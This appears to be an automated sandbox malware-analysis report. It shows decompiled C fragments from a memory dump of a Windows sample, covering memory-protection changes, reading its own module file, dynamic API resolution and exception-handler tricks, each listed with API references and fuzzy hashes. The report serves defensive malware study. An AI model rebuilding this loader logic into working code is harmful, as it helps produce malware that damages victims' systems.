                                                                                                                                                                        						_t11 = _t56 + 0xc; // 0xc
                                                                                                                                                                        						_t36 = VirtualProtect(_t39, 1,  *_t11, _t11); // executed
                                                                                                                                                                        						if(_t36 != 0) {
                                                                                                                                                                        							goto L8;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t37 = GetLastError();
                                                                                                                                                                        							_v8 = _t37;
                                                                                                                                                                        							if(_t37 == 0) {
                                                                                                                                                                        								goto L8;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				LeaveCriticalSection(_a4);
                                                                                                                                                                        				return _v8;
                                                                                                                                                                        			}


















                                                                                                                                                                        0x00401da6
                                                                                                                                                                        0x00401da8
                                                                                                                                                                        0x00401db2
                                                                                                                                                                        0x00401db9
                                                                                                                                                                        0x00401dbc
                                                                                                                                                                        0x00401dcb
                                                                                                                                                                        0x00401dd5
                                                                                                                                                                        0x00401de8
                                                                                                                                                                        0x00401deb
                                                                                                                                                                        0x00401df2
                                                                                                                                                                        0x00401df5
                                                                                                                                                                        0x00401ded
                                                                                                                                                                        0x00401def
                                                                                                                                                                        0x00401def
                                                                                                                                                                        0x00401df6
                                                                                                                                                                        0x00401dfc
                                                                                                                                                                        0x00401e1e
                                                                                                                                                                        0x00401e1e
                                                                                                                                                                        0x00401e21
                                                                                                                                                                        0x00401e26
                                                                                                                                                                        0x00401e29
                                                                                                                                                                        0x00401e31
                                                                                                                                                                        0x00401e33
                                                                                                                                                                        0x00401e35
                                                                                                                                                                        0x00401e37
                                                                                                                                                                        0x00401e3e
                                                                                                                                                                        0x00401e3e
                                                                                                                                                                        0x00401e42
                                                                                                                                                                        0x00401e44
                                                                                                                                                                        0x00401e59
                                                                                                                                                                        0x00401e46
                                                                                                                                                                        0x00401e48
                                                                                                                                                                        0x00401e4b
                                                                                                                                                                        0x00401e4c
                                                                                                                                                                        0x00401e50
                                                                                                                                                                        0x00401e52
                                                                                                                                                                        0x00401e54
                                                                                                                                                                        0x00401e54
                                                                                                                                                                        0x00401e60
                                                                                                                                                                        0x00401e60
                                                                                                                                                                        0x00401e60
                                                                                                                                                                        0x00401e65
                                                                                                                                                                        0x00401e65
                                                                                                                                                                        0x00401dfe
                                                                                                                                                                        0x00401dfe
                                                                                                                                                                        0x00401e07
                                                                                                                                                                        0x00401e0f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401e11
                                                                                                                                                                        0x00401e11
                                                                                                                                                                        0x00401e19
                                                                                                                                                                        0x00401e1c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401e1c
                                                                                                                                                                        0x00401e0f
                                                                                                                                                                        0x00401dfc
                                                                                                                                                                        0x00401e6c
                                                                                                                                                                        0x00401e79

                                                                                                                                                                        APIs
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401DBC
                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000001,0000000C,0000000C,?,?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401E07
                                                                                                                                                                        • GetLastError.KERNEL32(?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401E11
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401E6C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3666628472-0
                                                                                                                                                                        • Opcode ID: 9d610dfabf0101aea75969bf899ceb8f515411d493bf5a66a41a06d1e302b9ee
                                                                                                                                                                        • Instruction ID: 99f1bd1666aba7f9c62c34db6cf46ebf7b6a25346f6e8afa7671cca4496c2698
                                                                                                                                                                        • Opcode Fuzzy Hash: 9d610dfabf0101aea75969bf899ceb8f515411d493bf5a66a41a06d1e302b9ee
                                                                                                                                                                        • Instruction Fuzzy Hash: 80214F72600304AFDB20CF65CC44B9B77E5FB84364F10853AE919E72A0D778E945CB94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			E00401667(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, void* _a4) {
                                                                                                                                                                        				CHAR* _v8;
                                                                                                                                                                        				struct _OVERLAPPED* _v12;
                                                                                                                                                                        				long _v16;
                                                                                                                                                                        				void _v20;
                                                                                                                                                                        				void* _t16;
                                                                                                                                                                        				void* _t22;
                                                                                                                                                                        				long _t23;
                                                                                                                                                                        				int _t27;
                                                                                                                                                                        				long _t31;
                                                                                                                                                                        
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				_t16 = E00401BDE(__ebx, __ecx, __edx, __eflags, __edi,  &_v8, 0);
                                                                                                                                                                        				if(_t16 != 0) {
                                                                                                                                                                        					L11:
                                                                                                                                                                        					return _v12;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                        				_push(__edi); // executed
                                                                                                                                                                        				"j,hHA@"(); // executed
                                                                                                                                                                        				if(_t16 == 0) {
                                                                                                                                                                        					L10:
                                                                                                                                                                        					E00401759(_v8);
                                                                                                                                                                        					goto L11;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(__ebx);
                                                                                                                                                                        				_t31 = E00401CD7(__edi, __ecx, _t16 - __edi);
                                                                                                                                                                        				if(_t31 != 0) {
                                                                                                                                                                        					_t22 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                                                                                                                                        					_a4 = _t22;
                                                                                                                                                                        					if(_t22 != 0xffffffff) {
                                                                                                                                                                        						_t23 = SetFilePointer(_t22, _t31, 0, 0); // executed
                                                                                                                                                                        						if(_t23 == _t31) {
                                                                                                                                                                        							_t27 = ReadFile(_a4,  &_v20, 4,  &_v16, 0); // executed
                                                                                                                                                                        							if(_t27 != 0 && _v16 == 4) {
                                                                                                                                                                        								_v12 = _v20 + __edi;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						FindCloseChangeNotification(_a4); // executed
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L10;
                                                                                                                                                                        			}












                                                                                                                                                                        0x00401676
                                                                                                                                                                        0x00401679
                                                                                                                                                                        0x00401680
                                                                                                                                                                        0x0040170c
                                                                                                                                                                        0x00401711
                                                                                                                                                                        0x00401711
                                                                                                                                                                        0x00401686
                                                                                                                                                                        0x00401687
                                                                                                                                                                        0x0040168a
                                                                                                                                                                        0x0040168b
                                                                                                                                                                        0x00401692
                                                                                                                                                                        0x00401704
                                                                                                                                                                        0x00401707
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401707
                                                                                                                                                                        0x00401696
                                                                                                                                                                        0x0040169f
                                                                                                                                                                        0x004016a3
                                                                                                                                                                        0x004016b8
                                                                                                                                                                        0x004016c1
                                                                                                                                                                        0x004016c4
                                                                                                                                                                        0x004016ca
                                                                                                                                                                        0x004016d2
                                                                                                                                                                        0x004016e2
                                                                                                                                                                        0x004016ea
                                                                                                                                                                        0x004016f7
                                                                                                                                                                        0x004016f7
                                                                                                                                                                        0x004016ea
                                                                                                                                                                        0x004016fd
                                                                                                                                                                        0x004016fd
                                                                                                                                                                        0x004016c4
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00401BDE: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,?,00000000,?,?,00401C85,?,00000001,?,00000000), ref: 00401C04
                                                                                                                                                                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?), ref: 004016B8
                                                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,00402132,?), ref: 004016CA
                                                                                                                                                                        • ReadFile.KERNELBASE(?,?,00000004,?,00000000,?,?,?,?,?,00402132,?), ref: 004016E2
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00402132,?), ref: 004016FD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$ChangeCloseCreateFindModuleNameNotificationPointerRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3318007303-0
                                                                                                                                                                        • Opcode ID: 5bbbbd3aa86afcc0e4386a98720179ec2a7d3627c1b65dc99dcffb977315ad08
                                                                                                                                                                        • Instruction ID: ec45637102d6b2b0564e1f50d756395bedd24ba2b91383356c2343a33bb4597d
                                                                                                                                                                        • Opcode Fuzzy Hash: 5bbbbd3aa86afcc0e4386a98720179ec2a7d3627c1b65dc99dcffb977315ad08
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D117CB0A00118BBDB21ABA5DC85EAF7E6DEF41754F104026F605F61A0D7748E40DAA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E004012E6(void* __ecx) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				_Unknown_base(*)()* _t7;
                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                        				struct HINSTANCE__* _t10;
                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                        
                                                                                                                                                                        				_t7 =  *0x4054b8;
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t14 =  *0x40546c; // 0x1a0
                                                                                                                                                                        				if(_t7 != 0) {
                                                                                                                                                                        					L2:
                                                                                                                                                                        					if(_t14 != 0) {
                                                                                                                                                                        						_t9 =  *_t7(_t14,  &_v8);
                                                                                                                                                                        						if(_t9 == 0) {
                                                                                                                                                                        							_v8 = _v8 & _t9;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					L5:
                                                                                                                                                                        					return _v8;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t10 = GetModuleHandleA(0x406016); // executed
                                                                                                                                                                        				 *0x4054c0 = _t10; // executed
                                                                                                                                                                        				_t7 = GetProcAddress(_t10, 0x406209); // executed
                                                                                                                                                                        				 *0x4054b8 = _t7;
                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                        					goto L5;
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L2;
                                                                                                                                                                        			}








                                                                                                                                                                        0x004012ea
                                                                                                                                                                        0x004012ef
                                                                                                                                                                        0x004012f6
                                                                                                                                                                        0x004012fc
                                                                                                                                                                        0x00401323
                                                                                                                                                                        0x00401325
                                                                                                                                                                        0x0040132c
                                                                                                                                                                        0x00401330
                                                                                                                                                                        0x00401332
                                                                                                                                                                        0x00401332
                                                                                                                                                                        0x00401330
                                                                                                                                                                        0x00401335
                                                                                                                                                                        0x0040133a
                                                                                                                                                                        0x0040133a
                                                                                                                                                                        0x00401303
                                                                                                                                                                        0x0040130f
                                                                                                                                                                        0x00401314
                                                                                                                                                                        0x0040131c
                                                                                                                                                                        0x00401321
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNELBASE(00406016,00000000,?,?,004019B1,?,00000000), ref: 00401303
                                                                                                                                                                        • GetProcAddress.KERNELBASE(00000000,00406209), ref: 00401314
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                        • String ID: PWxt
                                                                                                                                                                        • API String ID: 1646373207-859090512
                                                                                                                                                                        • Opcode ID: b82fadf3abe6b121a3a9ccd6f8c7011957f696d7cd16a9b3f66cbe52e98997a9
                                                                                                                                                                        • Instruction ID: 42ee00f1bbdf4bd94032134305a6aa24ddba553fb98742428e3d6aee6d82d457
                                                                                                                                                                        • Opcode Fuzzy Hash: b82fadf3abe6b121a3a9ccd6f8c7011957f696d7cd16a9b3f66cbe52e98997a9
                                                                                                                                                                        • Instruction Fuzzy Hash: 0FF0FE71911614EBFB40DBA9EE05BEB77ACEB48715B11007AE905F3290E778DE408A6C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 24%
                                                                                                                                                                        			E004017F0(void* __eax, void* __ebx, void* __eflags) {
                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                        				void* _t32;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        
                                                                                                                                                                        				if(__eflags == 0) {
                                                                                                                                                                        					_t33 = _t32 + 1;
                                                                                                                                                                        					asm("cld");
                                                                                                                                                                        					_push(__eax);
                                                                                                                                                                        					_t9 = E00402BE5(__ebx);
                                                                                                                                                                        					__eflags = _t9;
                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                        						_t9 = E00402F32(__ebx, __ebx, __eflags);
                                                                                                                                                                        						__eflags = _t9;
                                                                                                                                                                        						if(_t9 == 0) {
                                                                                                                                                                        							_t10 =  *((intOrPtr*)(_t33 - 4));
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							_t7 = _t10 + 0xe; // 0xc70a74c0
                                                                                                                                                                        							_t9 = E00401B2B( *((intOrPtr*)(_t33 - 4)) + __ebx, ( *(_t33 - 0x14) ^  *(_t33 - 0x10)) + _t7,  *((intOrPtr*)(_t33 - 8)), ( *(_t33 - 0x14) ^  *(_t33 - 0x10)) + _t7); // executed
                                                                                                                                                                        							__eflags = _t9;
                                                                                                                                                                        							if(_t9 == 0) {
                                                                                                                                                                        								_t23 =  *0x4061c0 -  *0x4061cc +  *0x4061c4;
                                                                                                                                                                        								__eflags = _t23;
                                                                                                                                                                        								 *0x405490 = _t23;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					return _t9;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					return HeapAlloc();
                                                                                                                                                                        				}
                                                                                                                                                                        			}







                                                                                                                                                                        0x004017f0
                                                                                                                                                                        0x00401816
                                                                                                                                                                        0x00401817
                                                                                                                                                                        0x00401818
                                                                                                                                                                        0x0040181b
                                                                                                                                                                        0x00401820
                                                                                                                                                                        0x00401822
                                                                                                                                                                        0x00401824
                                                                                                                                                                        0x00401829
                                                                                                                                                                        0x0040182b
                                                                                                                                                                        0x0040182d
                                                                                                                                                                        0x0040183d
                                                                                                                                                                        0x0040183e
                                                                                                                                                                        0x0040183f
                                                                                                                                                                        0x00401846
                                                                                                                                                                        0x0040184d
                                                                                                                                                                        0x00401852
                                                                                                                                                                        0x00401856
                                                                                                                                                                        0x00401864
                                                                                                                                                                        0x00401864
                                                                                                                                                                        0x0040186a
                                                                                                                                                                        0x0040186a
                                                                                                                                                                        0x00401856
                                                                                                                                                                        0x0040182b
                                                                                                                                                                        0x00401872
                                                                                                                                                                        0x004017f2
                                                                                                                                                                        0x00401801
                                                                                                                                                                        0x00401801

                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00402F3B,00000028,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004017FB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                        • String ID: Nov 27 2018$pnls
                                                                                                                                                                        • API String ID: 4292702814-2641940728
                                                                                                                                                                        • Opcode ID: e6be84c049acb4b28d986b7440ac85b8ddb97ee12877b7dc0ff88ad08b654df5
                                                                                                                                                                        • Instruction ID: f44b72d3b629fb0394685678fed7df3424babebbe0900936eee55aa67ab105e5
                                                                                                                                                                        • Opcode Fuzzy Hash: e6be84c049acb4b28d986b7440ac85b8ddb97ee12877b7dc0ff88ad08b654df5
                                                                                                                                                                        • Instruction Fuzzy Hash: 3BF0A473A000018BC704EF69DE95AEF73B5EE95358711803AE806B72A1E779ED06C668
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00401E7C(intOrPtr* _a4) {
                                                                                                                                                                        				intOrPtr _t8;
                                                                                                                                                                        				void* _t11;
                                                                                                                                                                        				void* _t13;
                                                                                                                                                                        				intOrPtr _t16;
                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                        				intOrPtr _t18;
                                                                                                                                                                        				void* _t19;
                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                        				long* _t23;
                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                        
                                                                                                                                                                        				_t8 =  *0x4054c4; // 0x28885a8
                                                                                                                                                                        				_t24 = 0;
                                                                                                                                                                        				_t16 = _t8;
                                                                                                                                                                        				if(_t8 != 0) {
                                                                                                                                                                        					_t21 = _a4;
                                                                                                                                                                        					_t17 =  *_t21;
                                                                                                                                                                        					_t18 =  *_t17;
                                                                                                                                                                        					if(_t18 != 0xc0000005) {
                                                                                                                                                                        						if(_t18 == 0x80000004) {
                                                                                                                                                                        							_t7 = _t8 + 0x24; // 0x28885cc
                                                                                                                                                                        							_t23 = _t7;
                                                                                                                                                                        							if(TlsGetValue( *_t23) != 0) {
                                                                                                                                                                        								_t11 = E00401DA3(_t17, _t16, _t10, 0); // executed
                                                                                                                                                                        								if(_t11 == 0) {
                                                                                                                                                                        									TlsSetValue( *_t23, 0);
                                                                                                                                                                        									goto L8;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t19 =  *(_t17 + 0x18);
                                                                                                                                                                        						_t13 = E00401DA3(_t17, _t8, _t19, 1); // executed
                                                                                                                                                                        						if(_t13 == 0) {
                                                                                                                                                                        							TlsSetValue( *(_t16 + 0x24), _t19);
                                                                                                                                                                        							 *( *((intOrPtr*)(_t21 + 4)) + 0xc0) =  *( *((intOrPtr*)(_t21 + 4)) + 0xc0) | 0x00000100;
                                                                                                                                                                        							L8:
                                                                                                                                                                        							_t24 = _t24 | 0xffffffff;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t24;
                                                                                                                                                                        			}













                                                                                                                                                                        0x00401e7c
                                                                                                                                                                        0x00401e83
                                                                                                                                                                        0x00401e88
                                                                                                                                                                        0x00401e8a
                                                                                                                                                                        0x00401e8d
                                                                                                                                                                        0x00401e91
                                                                                                                                                                        0x00401e93
                                                                                                                                                                        0x00401e9b
                                                                                                                                                                        0x00401ecc
                                                                                                                                                                        0x00401ece
                                                                                                                                                                        0x00401ece
                                                                                                                                                                        0x00401edb
                                                                                                                                                                        0x00401ee0
                                                                                                                                                                        0x00401ee7
                                                                                                                                                                        0x00401eec
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401eec
                                                                                                                                                                        0x00401ee7
                                                                                                                                                                        0x00401edb
                                                                                                                                                                        0x00401e9d
                                                                                                                                                                        0x00401e9d
                                                                                                                                                                        0x00401ea4
                                                                                                                                                                        0x00401eab
                                                                                                                                                                        0x00401eb1
                                                                                                                                                                        0x00401eba
                                                                                                                                                                        0x00401ef2
                                                                                                                                                                        0x00401ef2
                                                                                                                                                                        0x00401ef2
                                                                                                                                                                        0x00401eab
                                                                                                                                                                        0x00401ef5
                                                                                                                                                                        0x00401efb

                                                                                                                                                                        APIs
                                                                                                                                                                        • TlsSetValue.KERNEL32(?,?,028885A8,?,00000001), ref: 00401EB1
                                                                                                                                                                        • TlsGetValue.KERNEL32(028885CC), ref: 00401ED3
                                                                                                                                                                        • TlsSetValue.KERNEL32(028885CC,00000000,028885A8,00000000,00000000), ref: 00401EEC
                                                                                                                                                                          • Part of subcall function 00401DA3: EnterCriticalSection.KERNEL32(?,?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401DBC
                                                                                                                                                                          • Part of subcall function 00401DA3: VirtualProtect.KERNELBASE(?,00000001,0000000C,0000000C,?,?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401E07
                                                                                                                                                                          • Part of subcall function 00401DA3: GetLastError.KERNEL32(?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401E11
                                                                                                                                                                          • Part of subcall function 00401DA3: LeaveCriticalSection.KERNEL32(?,?,?,028885CC,028885A8,?,00000000,00401EE5,028885A8,00000000,00000000), ref: 00401E6C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Value$CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3047629960-0
                                                                                                                                                                        • Opcode ID: f0bb79ce37d910672525577a142f4f4a2664175f463c63f617a46cd5490a18dc
                                                                                                                                                                        • Instruction ID: f892b702af702f492ff1e24afad92ac387df28dcef502a2ce2009bcd421de9d0
                                                                                                                                                                        • Opcode Fuzzy Hash: f0bb79ce37d910672525577a142f4f4a2664175f463c63f617a46cd5490a18dc
                                                                                                                                                                        • Instruction Fuzzy Hash: 5601B171200105ABDB209F55DE48E2B77ADEF95355F21057EFE41B32B0DB3AEC409AA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E004027D6(intOrPtr __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, signed char _a16) {
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                        				void* _t14;
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        				void* _t23;
                                                                                                                                                                        				void* _t24;
                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                        				void* _t27;
                                                                                                                                                                        
                                                                                                                                                                        				_t25 = __edx;
                                                                                                                                                                        				_t23 = 8;
                                                                                                                                                                        				_push(0x318);
                                                                                                                                                                        				_t27 = E004017EF(_t14, _t23, __eflags);
                                                                                                                                                                        				if(_t27 != 0) {
                                                                                                                                                                        					memset(_t27, 0, 0x318);
                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                        					 *((intOrPtr*)(_t27 + 8)) = _a8;
                                                                                                                                                                        					 *((intOrPtr*)(_t27 + 0xc)) = _t25;
                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                        					 *((intOrPtr*)(_t27 + 0x10)) = _a12;
                                                                                                                                                                        					 *((intOrPtr*)(_t27 + 0x14)) = _t25;
                                                                                                                                                                        					if((_a16 & 0x00000010) != 0) {
                                                                                                                                                                        						L4:
                                                                                                                                                                        						_t21 = E00402F98(_a4, _t24, _t25, _t27); // executed
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t33 =  *0x405478 & 0x00000001;
                                                                                                                                                                        						if(( *0x405478 & 0x00000001) == 0) {
                                                                                                                                                                        							goto L4;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t21 = E00401152(_t24, _t25, _t27, _t33, _a4);
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_t23 = _t21;
                                                                                                                                                                        					E00401759(_t27);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t23;
                                                                                                                                                                        			}













                                                                                                                                                                        0x004027d6
                                                                                                                                                                        0x004027df
                                                                                                                                                                        0x004027e5
                                                                                                                                                                        0x004027eb
                                                                                                                                                                        0x004027ef
                                                                                                                                                                        0x004027f5
                                                                                                                                                                        0x004027fd
                                                                                                                                                                        0x004027fe
                                                                                                                                                                        0x00402804
                                                                                                                                                                        0x00402807
                                                                                                                                                                        0x0040280f
                                                                                                                                                                        0x00402812
                                                                                                                                                                        0x00402815
                                                                                                                                                                        0x0040282a
                                                                                                                                                                        0x0040282d
                                                                                                                                                                        0x00402817
                                                                                                                                                                        0x00402817
                                                                                                                                                                        0x0040281e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402820
                                                                                                                                                                        0x00402823
                                                                                                                                                                        0x00402823
                                                                                                                                                                        0x0040281e
                                                                                                                                                                        0x00402833
                                                                                                                                                                        0x00402835
                                                                                                                                                                        0x00402835
                                                                                                                                                                        0x00402841

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004017EF: HeapAlloc.KERNEL32(00000000,?,00402F3B,00000028,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004017FB
                                                                                                                                                                        • memset.NTDLL ref: 004027F5
                                                                                                                                                                          • Part of subcall function 00401152: memset.NTDLL ref: 00401178
                                                                                                                                                                          • Part of subcall function 00401152: memcpy.NTDLL ref: 004011A0
                                                                                                                                                                          • Part of subcall function 00401152: GetLastError.KERNEL32(00000010,00000218,004031BD,00000100,?,00000318,00000008), ref: 004011B7
                                                                                                                                                                          • Part of subcall function 00401152: GetLastError.KERNEL32(00000010,?,00000000,?,?,?,?,?,?,?,?,00000010,00000218,004031BD,00000100), ref: 00401295
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastmemset$AllocHeapmemcpy
                                                                                                                                                                        • String ID: w)@
                                                                                                                                                                        • API String ID: 1944541758-2623895996
                                                                                                                                                                        • Opcode ID: 58b65bcc03392f07201bb3d8eef2a0bba0991503ac3b41638cd973c80079b080
                                                                                                                                                                        • Instruction ID: a231346dc3ff00611907bf072bf1c0deacee3ba72b6151c5b3ababc7b41969a1
                                                                                                                                                                        • Opcode Fuzzy Hash: 58b65bcc03392f07201bb3d8eef2a0bba0991503ac3b41638cd973c80079b080
                                                                                                                                                                        • Instruction Fuzzy Hash: 480126325013086BD321AF29DC45B873BE8EF44318F10813FF845A72D1D3B8D90487A8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
